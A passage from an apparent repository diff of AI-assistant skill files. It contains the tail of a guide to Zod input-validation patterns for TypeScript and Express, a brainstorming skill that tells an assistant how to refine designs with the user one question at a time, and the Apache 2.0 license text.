|
export const updateOrderSchema = z.object({
|
||||||
|
source: z.object({
|
||||||
|
index: z.number().int().min(0),
|
||||||
|
sectionID: z.number().int().min(0),
|
||||||
|
}),
|
||||||
|
destination: z.object({
|
||||||
|
index: z.number().int().min(0),
|
||||||
|
sectionID: z.number().int().min(0),
|
||||||
|
}),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Controller-specific validation schemas
|
||||||
|
export const createQuestionValidationSchema = z.object({
|
||||||
|
formID: z.number().int().positive(),
|
||||||
|
sectionID: z.number().int().positive(),
|
||||||
|
question: questionSchema,
|
||||||
|
index: z.number().int().min(0).nullable().optional(),
|
||||||
|
username: z.string(),
|
||||||
|
});
|
||||||
|
|
||||||
|
export const updateQuestionValidationSchema = z.object({
|
||||||
|
questionID: z.number().int().positive(),
|
||||||
|
username: z.string(),
|
||||||
|
question: questionSchema,
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Proxy Relationship Schema
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Proxy relationship validation
|
||||||
|
const createProxySchema = z.object({
|
||||||
|
originalUserID: z.string().min(1),
|
||||||
|
proxyUserID: z.string().min(1),
|
||||||
|
startsAt: z.string().datetime(),
|
||||||
|
expiresAt: z.string().datetime(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// With custom validation
|
||||||
|
const createProxySchemaWithValidation = createProxySchema.refine(
|
||||||
|
(data) => new Date(data.expiresAt) > new Date(data.startsAt),
|
||||||
|
{
|
||||||
|
message: 'expiresAt must be after startsAt',
|
||||||
|
path: ['expiresAt'],
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Workflow Validation
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Workflow start schema
|
||||||
|
const startWorkflowSchema = z.object({
|
||||||
|
workflowCode: z.string().min(1),
|
||||||
|
entityType: z.enum(['Post', 'User', 'Comment']),
|
||||||
|
entityID: z.number().int().positive(),
|
||||||
|
dryRun: z.boolean().optional().default(false),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Workflow step completion schema
|
||||||
|
const completeStepSchema = z.object({
|
||||||
|
stepInstanceID: z.number().int().positive(),
|
||||||
|
answers: z.record(z.string(), z.any()),
|
||||||
|
dryRun: z.boolean().optional().default(false),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Route-Level Validation
|
||||||
|
|
||||||
|
### Pattern 1: Inline Validation
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// routes/proxyRoutes.ts
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
const createProxySchema = z.object({
|
||||||
|
originalUserID: z.string().min(1),
|
||||||
|
proxyUserID: z.string().min(1),
|
||||||
|
startsAt: z.string().datetime(),
|
||||||
|
expiresAt: z.string().datetime(),
|
||||||
|
});
|
||||||
|
|
||||||
|
router.post(
|
||||||
|
'/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
async (req, res) => {
|
||||||
|
try {
|
||||||
|
// Validate at route level
|
||||||
|
const validated = createProxySchema.parse(req.body);
|
||||||
|
|
||||||
|
// Delegate to service
|
||||||
|
const proxy = await proxyService.createProxyRelationship(validated);
|
||||||
|
|
||||||
|
res.status(201).json({ success: true, data: proxy });
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return res.status(400).json({
|
||||||
|
success: false,
|
||||||
|
error: {
|
||||||
|
message: 'Validation failed',
|
||||||
|
details: error.errors,
|
||||||
|
},
|
||||||
|
});
|
||||||
|
}
|
||||||
|
handler.handleException(res, error);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
**Pros:**
|
||||||
|
- Quick and simple
|
||||||
|
- Good for simple routes
|
||||||
|
|
||||||
|
**Cons:**
|
||||||
|
- Validation logic in routes
|
||||||
|
- Harder to test
|
||||||
|
- Not reusable
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Controller Validation
|
||||||
|
|
||||||
|
### Pattern 2: Controller Validation (Recommended)
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// validators/userSchemas.ts
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
export const createUserSchema = z.object({
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string().min(2).max(100),
|
||||||
|
roles: z.array(z.enum(['admin', 'operations', 'user'])),
|
||||||
|
isActive: z.boolean().default(true),
|
||||||
|
});
|
||||||
|
|
||||||
|
export const updateUserSchema = z.object({
|
||||||
|
email: z.string().email().optional(),
|
||||||
|
name: z.string().min(2).max(100).optional(),
|
||||||
|
roles: z.array(z.enum(['admin', 'operations', 'user'])).optional(),
|
||||||
|
isActive: z.boolean().optional(),
|
||||||
|
});
|
||||||
|
|
||||||
|
export type CreateUserDTO = z.infer<typeof createUserSchema>;
|
||||||
|
export type UpdateUserDTO = z.infer<typeof updateUserSchema>;
|
||||||
|
```
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// controllers/UserController.ts
|
||||||
|
import { Request, Response } from 'express';
|
||||||
|
import { BaseController } from './BaseController';
|
||||||
|
import { UserService } from '../services/userService';
|
||||||
|
import { createUserSchema, updateUserSchema } from '../validators/userSchemas';
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
export class UserController extends BaseController {
|
||||||
|
private userService: UserService;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
super();
|
||||||
|
this.userService = new UserService();
|
||||||
|
}
|
||||||
|
|
||||||
|
async createUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
// Validate input
|
||||||
|
const validated = createUserSchema.parse(req.body);
|
||||||
|
|
||||||
|
// Call service
|
||||||
|
const user = await this.userService.createUser(validated);
|
||||||
|
|
||||||
|
this.handleSuccess(res, user, 'User created successfully', 201);
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
// Handle validation errors with 400 status
|
||||||
|
return this.handleError(error, res, 'createUser', 400);
|
||||||
|
}
|
||||||
|
this.handleError(error, res, 'createUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async updateUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
// Validate params and body
|
||||||
|
const userId = req.params.id;
|
||||||
|
const validated = updateUserSchema.parse(req.body);
|
||||||
|
|
||||||
|
const user = await this.userService.updateUser(userId, validated);
|
||||||
|
|
||||||
|
this.handleSuccess(res, user, 'User updated successfully');
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return this.handleError(error, res, 'updateUser', 400);
|
||||||
|
}
|
||||||
|
this.handleError(error, res, 'updateUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Pros:**
|
||||||
|
- Clean separation
|
||||||
|
- Reusable schemas
|
||||||
|
- Easy to test
|
||||||
|
- Type-safe DTOs
|
||||||
|
|
||||||
|
**Cons:**
|
||||||
|
- More files to manage
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## DTO Pattern
|
||||||
|
|
||||||
|
### Type Inference from Schemas
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
// Define schema
|
||||||
|
const createUserSchema = z.object({
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string(),
|
||||||
|
age: z.number().int().positive(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Infer TypeScript type from schema
|
||||||
|
type CreateUserDTO = z.infer<typeof createUserSchema>;
|
||||||
|
|
||||||
|
// Equivalent to:
|
||||||
|
// type CreateUserDTO = {
|
||||||
|
// email: string;
|
||||||
|
// name: string;
|
||||||
|
// age: number;
|
||||||
|
// }
|
||||||
|
|
||||||
|
// Use in service
|
||||||
|
class UserService {
|
||||||
|
async createUser(data: CreateUserDTO): Promise<User> {
|
||||||
|
// data is fully typed!
|
||||||
|
console.log(data.email); // ✅ TypeScript knows this exists
|
||||||
|
console.log(data.invalid); // ❌ TypeScript error!
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Input vs Output Types
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Input schema (what API receives)
|
||||||
|
const createUserInputSchema = z.object({
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string(),
|
||||||
|
password: z.string().min(8),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Output schema (what API returns)
|
||||||
|
const userOutputSchema = z.object({
|
||||||
|
id: z.string().uuid(),
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string(),
|
||||||
|
createdAt: z.string().datetime(),
|
||||||
|
// password excluded!
|
||||||
|
});
|
||||||
|
|
||||||
|
type CreateUserInput = z.infer<typeof createUserInputSchema>;
|
||||||
|
type UserOutput = z.infer<typeof userOutputSchema>;
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Handling
|
||||||
|
|
||||||
|
### Zod Error Format
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
try {
|
||||||
|
const validated = schema.parse(data);
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
console.log(error.errors);
|
||||||
|
// [
|
||||||
|
// {
|
||||||
|
// code: 'invalid_type',
|
||||||
|
// expected: 'string',
|
||||||
|
// received: 'number',
|
||||||
|
// path: ['email'],
|
||||||
|
// message: 'Expected string, received number'
|
||||||
|
// }
|
||||||
|
// ]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Custom Error Messages
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
const userSchema = z.object({
|
||||||
|
email: z.string().email({ message: 'Please provide a valid email address' }),
|
||||||
|
name: z.string().min(2, { message: 'Name must be at least 2 characters' }),
|
||||||
|
age: z.number().int().positive({ message: 'Age must be a positive number' }),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Formatted Error Response
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Helper function to format Zod errors
|
||||||
|
function formatZodError(error: z.ZodError) {
|
||||||
|
return {
|
||||||
|
message: 'Validation failed',
|
||||||
|
errors: error.errors.map((err) => ({
|
||||||
|
field: err.path.join('.'),
|
||||||
|
message: err.message,
|
||||||
|
code: err.code,
|
||||||
|
})),
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
// In controller
|
||||||
|
catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return res.status(400).json({
|
||||||
|
success: false,
|
||||||
|
error: formatZodError(error),
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Response example:
|
||||||
|
// {
|
||||||
|
// "success": false,
|
||||||
|
// "error": {
|
||||||
|
// "message": "Validation failed",
|
||||||
|
// "errors": [
|
||||||
|
// {
|
||||||
|
// "field": "email",
|
||||||
|
// "message": "Invalid email",
|
||||||
|
// "code": "invalid_string"
|
||||||
|
// }
|
||||||
|
// ]
|
||||||
|
// }
|
||||||
|
// }
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Advanced Patterns
|
||||||
|
|
||||||
|
### Conditional Validation
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Validate based on other field values
|
||||||
|
const submissionSchema = z.object({
|
||||||
|
type: z.enum(['NEW', 'UPDATE']),
|
||||||
|
postId: z.number().optional(),
|
||||||
|
}).refine(
|
||||||
|
(data) => {
|
||||||
|
// If type is UPDATE, postId is required
|
||||||
|
if (data.type === 'UPDATE') {
|
||||||
|
return data.postId !== undefined;
|
||||||
|
}
|
||||||
|
return true;
|
||||||
|
},
|
||||||
|
{
|
||||||
|
message: 'postId is required when type is UPDATE',
|
||||||
|
path: ['postId'],
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Transform Data
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Transform strings to numbers
|
||||||
|
const userSchema = z.object({
|
||||||
|
name: z.string(),
|
||||||
|
age: z.string().transform((val) => parseInt(val, 10)),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Transform dates
|
||||||
|
const eventSchema = z.object({
|
||||||
|
name: z.string(),
|
||||||
|
date: z.string().transform((str) => new Date(str)),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Preprocess Data
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Trim strings before validation
|
||||||
|
const userSchema = z.object({
|
||||||
|
email: z.preprocess(
|
||||||
|
(val) => typeof val === 'string' ? val.trim().toLowerCase() : val,
|
||||||
|
z.string().email()
|
||||||
|
),
|
||||||
|
name: z.preprocess(
|
||||||
|
(val) => typeof val === 'string' ? val.trim() : val,
|
||||||
|
z.string().min(2)
|
||||||
|
),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Union Types
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Multiple possible types
|
||||||
|
const idSchema = z.union([z.string(), z.number()]);
|
||||||
|
|
||||||
|
// Discriminated unions
|
||||||
|
const notificationSchema = z.discriminatedUnion('type', [
|
||||||
|
z.object({
|
||||||
|
type: z.literal('email'),
|
||||||
|
recipient: z.string().email(),
|
||||||
|
subject: z.string(),
|
||||||
|
}),
|
||||||
|
z.object({
|
||||||
|
type: z.literal('sms'),
|
||||||
|
phoneNumber: z.string(),
|
||||||
|
message: z.string(),
|
||||||
|
}),
|
||||||
|
]);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Recursive Schemas
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// For nested structures like trees
|
||||||
|
type Category = {
|
||||||
|
id: number;
|
||||||
|
name: string;
|
||||||
|
children?: Category[];
|
||||||
|
};
|
||||||
|
|
||||||
|
const categorySchema: z.ZodType<Category> = z.lazy(() =>
|
||||||
|
z.object({
|
||||||
|
id: z.number(),
|
||||||
|
name: z.string(),
|
||||||
|
children: z.array(categorySchema).optional(),
|
||||||
|
})
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Schema Composition
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Base schemas
|
||||||
|
const timestampsSchema = z.object({
|
||||||
|
createdAt: z.string().datetime(),
|
||||||
|
updatedAt: z.string().datetime(),
|
||||||
|
});
|
||||||
|
|
||||||
|
const auditSchema = z.object({
|
||||||
|
createdBy: z.string(),
|
||||||
|
updatedBy: z.string(),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Compose schemas
|
||||||
|
const userSchema = z.object({
|
||||||
|
id: z.string(),
|
||||||
|
email: z.string().email(),
|
||||||
|
name: z.string(),
|
||||||
|
}).merge(timestampsSchema).merge(auditSchema);
|
||||||
|
|
||||||
|
// Extend schemas
|
||||||
|
const adminUserSchema = userSchema.extend({
|
||||||
|
adminLevel: z.number().int().min(1).max(5),
|
||||||
|
permissions: z.array(z.string()),
|
||||||
|
});
|
||||||
|
|
||||||
|
// Pick specific fields
|
||||||
|
const publicUserSchema = userSchema.pick({
|
||||||
|
id: true,
|
||||||
|
name: true,
|
||||||
|
// email excluded
|
||||||
|
});
|
||||||
|
|
||||||
|
// Omit fields
|
||||||
|
const userWithoutTimestamps = userSchema.omit({
|
||||||
|
createdAt: true,
|
||||||
|
updatedAt: true,
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Validation Middleware
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Create reusable validation middleware
|
||||||
|
import { Request, Response, NextFunction } from 'express';
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
export function validateBody<T extends z.ZodType>(schema: T) {
|
||||||
|
return (req: Request, res: Response, next: NextFunction) => {
|
||||||
|
try {
|
||||||
|
req.body = schema.parse(req.body);
|
||||||
|
next();
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return res.status(400).json({
|
||||||
|
success: false,
|
||||||
|
error: {
|
||||||
|
message: 'Validation failed',
|
||||||
|
details: error.errors,
|
||||||
|
},
|
||||||
|
});
|
||||||
|
}
|
||||||
|
next(error);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
// Usage
|
||||||
|
router.post('/users',
|
||||||
|
validateBody(createUserSchema),
|
||||||
|
async (req, res) => {
|
||||||
|
// req.body is validated and typed!
|
||||||
|
const user = await userService.createUser(req.body);
|
||||||
|
res.json({ success: true, data: user });
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md) - Main guide
|
||||||
|
- [routing-and-controllers.md](routing-and-controllers.md) - Using validation in controllers
|
||||||
|
- [services-and-repositories.md](services-and-repositories.md) - Using DTOs in services
|
||||||
|
- [async-and-errors.md](async-and-errors.md) - Error handling patterns
|
||||||
54
skills/brainstorming/SKILL.md
Normal file
54
skills/brainstorming/SKILL.md
Normal file
@@ -0,0 +1,54 @@
|
|||||||
|
---
|
||||||
|
name: brainstorming
|
||||||
|
description: "You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. Explores user intent, requirements and design before implementation."
|
||||||
|
---
|
||||||
|
|
||||||
|
# Brainstorming Ideas Into Designs
|
||||||
|
|
||||||
|
## Overview
|
||||||
|
|
||||||
|
Help turn ideas into fully formed designs and specs through natural collaborative dialogue.
|
||||||
|
|
||||||
|
Start by understanding the current project context, then ask questions one at a time to refine the idea. Once you understand what you're building, present the design in small sections (200-300 words), checking after each section whether it looks right so far.
|
||||||
|
|
||||||
|
## The Process
|
||||||
|
|
||||||
|
**Understanding the idea:**
|
||||||
|
- Check out the current project state first (files, docs, recent commits)
|
||||||
|
- Ask questions one at a time to refine the idea
|
||||||
|
- Prefer multiple choice questions when possible, but open-ended is fine too
|
||||||
|
- Only one question per message - if a topic needs more exploration, break it into multiple questions
|
||||||
|
- Focus on understanding: purpose, constraints, success criteria
|
||||||
|
|
||||||
|
**Exploring approaches:**
|
||||||
|
- Propose 2-3 different approaches with trade-offs
|
||||||
|
- Present options conversationally with your recommendation and reasoning
|
||||||
|
- Lead with your recommended option and explain why
|
||||||
|
|
||||||
|
**Presenting the design:**
|
||||||
|
- Once you believe you understand what you're building, present the design
|
||||||
|
- Break it into sections of 200-300 words
|
||||||
|
- Ask after each section whether it looks right so far
|
||||||
|
- Cover: architecture, components, data flow, error handling, testing
|
||||||
|
- Be ready to go back and clarify if something doesn't make sense
|
||||||
|
|
||||||
|
## After the Design
|
||||||
|
|
||||||
|
**Documentation:**
|
||||||
|
- Write the validated design to `docs/plans/YYYY-MM-DD-<topic>-design.md`
|
||||||
|
- Use elements-of-style:writing-clearly-and-concisely skill if available
|
||||||
|
- Commit the design document to git
|
||||||
|
|
||||||
|
**Implementation (if continuing):**
|
||||||
|
- Ask: "Ready to set up for implementation?"
|
||||||
|
- Use superpowers:using-git-worktrees to create isolated workspace
|
||||||
|
- Use superpowers:writing-plans to create detailed implementation plan
|
||||||
|
|
||||||
|
## Key Principles
|
||||||
|
|
||||||
|
- **One question at a time** - Don't overwhelm with multiple questions
|
||||||
|
- **Multiple choice preferred** - Easier to answer than open-ended when possible
|
||||||
|
- **YAGNI ruthlessly** - Remove unnecessary features from all designs
|
||||||
|
- **Explore alternatives** - Always propose 2-3 approaches before settling
|
||||||
|
- **Incremental validation** - Present design in sections, validate each
|
||||||
|
- **Be flexible** - Go back and clarify when something doesn't make sense
|
||||||
202
skills/brand-guidelines/LICENSE.txt
Normal file
202
skills/brand-guidelines/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@
|
|||||||
|
|
||||||
|
Apache License
|
||||||
|
Version 2.0, January 2004
|
||||||
|
http://www.apache.org/licenses/
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||||
|
|
||||||
|
1. Definitions.
|
||||||
|
|
||||||
|
"License" shall mean the terms and conditions for use, reproduction,
|
||||||
|
and distribution as defined by Sections 1 through 9 of this document.
|
||||||
|
|
||||||
|
"Licensor" shall mean the copyright owner or entity authorized by
|
||||||
|
the copyright owner that is granting the License.
|
||||||
|
|
||||||
|
"Legal Entity" shall mean the union of the acting entity and all
|
||||||
|
other entities that control, are controlled by, or are under common
|
||||||
|
control with that entity. For the purposes of this definition,
|
||||||
|
"control" means (i) the power, direct or indirect, to cause the
|
||||||
|
direction or management of such entity, whether by contract or
|
||||||
|
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||||
|
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||||
|
|
||||||
|
"You" (or "Your") shall mean an individual or Legal Entity
|
||||||
|
exercising permissions granted by this License.
|
||||||
|
|
||||||
|
"Source" form shall mean the preferred form for making modifications,
|
||||||
|
including but not limited to software source code, documentation
|
||||||
|
source, and configuration files.
|
||||||
|
|
||||||
|
"Object" form shall mean any form resulting from mechanical
|
||||||
|
transformation or translation of a Source form, including but
|
||||||
|
not limited to compiled object code, generated documentation,
|
||||||
|
and conversions to other media types.
|
||||||
|
|
||||||
|
"Work" shall mean the work of authorship, whether in Source or
|
||||||
|
Object form, made available under the License, as indicated by a
|
||||||
|
copyright notice that is included in or attached to the work
|
||||||
|
(an example is provided in the Appendix below).
|
||||||
|
|
||||||
|
"Derivative Works" shall mean any work, whether in Source or Object
|
||||||
|
form, that is based on (or derived from) the Work and for which the
|
||||||
|
editorial revisions, annotations, elaborations, or other modifications
|
||||||
|
represent, as a whole, an original work of authorship. For the purposes
|
||||||
|
of this License, Derivative Works shall not include works that remain
|
||||||
|
separable from, or merely link (or bind by name) to the interfaces of,
|
||||||
|
the Work and Derivative Works thereof.
|
||||||
|
|
||||||
|
"Contribution" shall mean any work of authorship, including
|
||||||
|
the original version of the Work and any modifications or additions
|
||||||
|
to that Work or Derivative Works thereof, that is intentionally
|
||||||
|
submitted to Licensor for inclusion in the Work by the copyright owner
|
||||||
|
or by an individual or Legal Entity authorized to submit on behalf of
|
||||||
|
the copyright owner. For the purposes of this definition, "submitted"
|
||||||
|
means any form of electronic, verbal, or written communication sent
|
||||||
|
to the Licensor or its representatives, including but not limited to
|
||||||
|
communication on electronic mailing lists, source code control systems,
|
||||||
|
and issue tracking systems that are managed by, or on behalf of, the
|
||||||
|
Licensor for the purpose of discussing and improving the Work, but
|
||||||
|
excluding communication that is conspicuously marked or otherwise
|
||||||
|
designated in writing by the copyright owner as "Not a Contribution."
|
||||||
|
|
||||||
|
"Contributor" shall mean Licensor and any individual or Legal Entity
|
||||||
|
on behalf of whom a Contribution has been received by Licensor and
|
||||||
|
subsequently incorporated within the Work.
|
||||||
|
|
||||||
|
2. Grant of Copyright License. Subject to the terms and conditions of
|
||||||
|
this License, each Contributor hereby grants to You a perpetual,
|
||||||
|
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||||
|
copyright license to reproduce, prepare Derivative Works of,
|
||||||
|
publicly display, publicly perform, sublicense, and distribute the
|
||||||
|
Work and such Derivative Works in Source or Object form.
|
||||||
|
|
||||||
|
3. Grant of Patent License. Subject to the terms and conditions of
|
||||||
|
this License, each Contributor hereby grants to You a perpetual,
|
||||||
|
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||||
|
(except as stated in this section) patent license to make, have made,
|
||||||
|
use, offer to sell, sell, import, and otherwise transfer the Work,
|
||||||
|
where such license applies only to those patent claims licensable
|
||||||
|
by such Contributor that are necessarily infringed by their
|
||||||
|
Contribution(s) alone or by combination of their Contribution(s)
|
||||||
|
with the Work to which such Contribution(s) was submitted. If You
|
||||||
|
institute patent litigation against any entity (including a
|
||||||
|
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
||||||
|
or a Contribution incorporated within the Work constitutes direct
|
||||||
|
or contributory patent infringement, then any patent licenses
|
||||||
|
granted to You under this License for that Work shall terminate
|
||||||
|
as of the date such litigation is filed.
|
||||||
|
|
||||||
|
4. Redistribution. You may reproduce and distribute copies of the
|
||||||
|
Work or Derivative Works thereof in any medium, with or without
|
||||||
|
modifications, and in Source or Object form, provided that You
|
||||||
|
meet the following conditions:
|
||||||
|
|
||||||
|
(a) You must give any other recipients of the Work or
|
||||||
|
Derivative Works a copy of this License; and
|
||||||
|
|
||||||
|
(b) You must cause any modified files to carry prominent notices
|
||||||
|
stating that You changed the files; and
|
||||||
|
|
||||||
|
(c) You must retain, in the Source form of any Derivative Works
|
||||||
|
that You distribute, all copyright, patent, trademark, and
|
||||||
|
attribution notices from the Source form of the Work,
|
||||||
|
excluding those notices that do not pertain to any part of
|
||||||
|
the Derivative Works; and
|
||||||
|
|
||||||
|
(d) If the Work includes a "NOTICE" text file as part of its
|
||||||
|
distribution, then any Derivative Works that You distribute must
|
||||||
|
include a readable copy of the attribution notices contained
|
||||||
|
within such NOTICE file, excluding those notices that do not
|
||||||
|
pertain to any part of the Derivative Works, in at least one
|
||||||
|
of the following places: within a NOTICE text file distributed
|
||||||
|
as part of the Derivative Works; within the Source form or
|
||||||
|
documentation, if provided along with the Derivative Works; or,
|
||||||
|
within a display generated by the Derivative Works, if and
|
||||||
|
wherever such third-party notices normally appear. The contents
|
||||||
|
of the NOTICE file are for informational purposes only and
|
||||||
|
do not modify the License. You may add Your own attribution
|
||||||
|
notices within Derivative Works that You distribute, alongside
|
||||||
|
or as an addendum to the NOTICE text from the Work, provided
|
||||||
|
that such additional attribution notices cannot be construed
|
||||||
|
as modifying the License.
|
||||||
|
|
||||||
|
You may add Your own copyright statement to Your modifications and
|
||||||
|
may provide additional or different license terms and conditions
|
||||||
|
for use, reproduction, or distribution of Your modifications, or
|
||||||
|
for any such Derivative Works as a whole, provided Your use,
|
||||||
|
reproduction, and distribution of the Work otherwise complies with
|
||||||
|
the conditions stated in this License.
|
||||||
|
|
||||||
|
5. Submission of Contributions. Unless You explicitly state otherwise,
|
||||||
|
any Contribution intentionally submitted for inclusion in the Work
|
||||||
|
by You to the Licensor shall be under the terms and conditions of
|
||||||
|
this License, without any additional terms or conditions.
|
||||||
|
Notwithstanding the above, nothing herein shall supersede or modify
|
||||||
|
the terms of any separate license agreement you may have executed
|
||||||
|
with Licensor regarding such Contributions.
|
||||||
|
|
||||||
|
6. Trademarks. This License does not grant permission to use the trade
|
||||||
|
names, trademarks, service marks, or product names of the Licensor,
|
||||||
|
except as required for reasonable and customary use in describing the
|
||||||
|
origin of the Work and reproducing the content of the NOTICE file.
|
||||||
|
|
||||||
|
7. Disclaimer of Warranty. Unless required by applicable law or
|
||||||
|
agreed to in writing, Licensor provides the Work (and each
|
||||||
|
Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||||
|
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
||||||
|
implied, including, without limitation, any warranties or conditions
|
||||||
|
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
||||||
|
PARTICULAR PURPOSE. You are solely responsible for determining the
|
||||||
|
appropriateness of using or redistributing the Work and assume any
|
||||||
|
risks associated with Your exercise of permissions under this License.
|
||||||
|
|
||||||
|
8. Limitation of Liability. In no event and under no legal theory,
|
||||||
|
whether in tort (including negligence), contract, or otherwise,
|
||||||
|
unless required by applicable law (such as deliberate and grossly
|
||||||
|
negligent acts) or agreed to in writing, shall any Contributor be
|
||||||
|
liable to You for damages, including any direct, indirect, special,
|
||||||
|
incidental, or consequential damages of any character arising as a
|
||||||
|
result of this License or out of the use or inability to use the
|
||||||
|
Work (including but not limited to damages for loss of goodwill,
|
||||||
|
work stoppage, computer failure or malfunction, or any and all
|
||||||
|
other commercial damages or losses), even if such Contributor
|
||||||
|
has been advised of the possibility of such damages.
|
||||||
|
|
||||||
|
9. Accepting Warranty or Additional Liability. While redistributing
|
||||||
|
the Work or Derivative Works thereof, You may choose to offer,
|
||||||
|
and charge a fee for, acceptance of support, warranty, indemnity,
|
||||||
|
or other liability obligations and/or rights consistent with this
|
||||||
|
License. However, in accepting such obligations, You may act only
|
||||||
|
on Your own behalf and on Your sole responsibility, not on behalf
|
||||||
|
of any other Contributor, and only if You agree to indemnify,
|
||||||
|
defend, and hold each Contributor harmless for any liability
|
||||||
|
incurred by, or claims asserted against, such Contributor by reason
|
||||||
|
of your accepting any such warranty or additional liability.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
APPENDIX: How to apply the Apache License to your work.
|
||||||
|
|
||||||
|
To apply the Apache License to your work, attach the following
|
||||||
|
boilerplate notice, with the fields enclosed by brackets "[]"
|
||||||
|
replaced with your own identifying information. (Don't include
|
||||||
|
the brackets!) The text should be enclosed in the appropriate
|
||||||
|
comment syntax for the file format. We also recommend that a
|
||||||
|
file or class name and description of purpose be included on the
|
||||||
|
same "printed page" as the copyright notice for easier
|
||||||
|
identification within third-party archives.
|
||||||
|
|
||||||
|
Copyright [yyyy] [name of copyright owner]
|
||||||
|
|
||||||
|
Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
you may not use this file except in compliance with the License.
|
||||||
|
You may obtain a copy of the License at
|
||||||
|
|
||||||
|
http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
|
||||||
|
Unless required by applicable law or agreed to in writing, software
|
||||||
|
distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
See the License for the specific language governing permissions and
|
||||||
|
limitations under the License.
|
||||||
73
skills/brand-guidelines/SKILL.md
Normal file
73
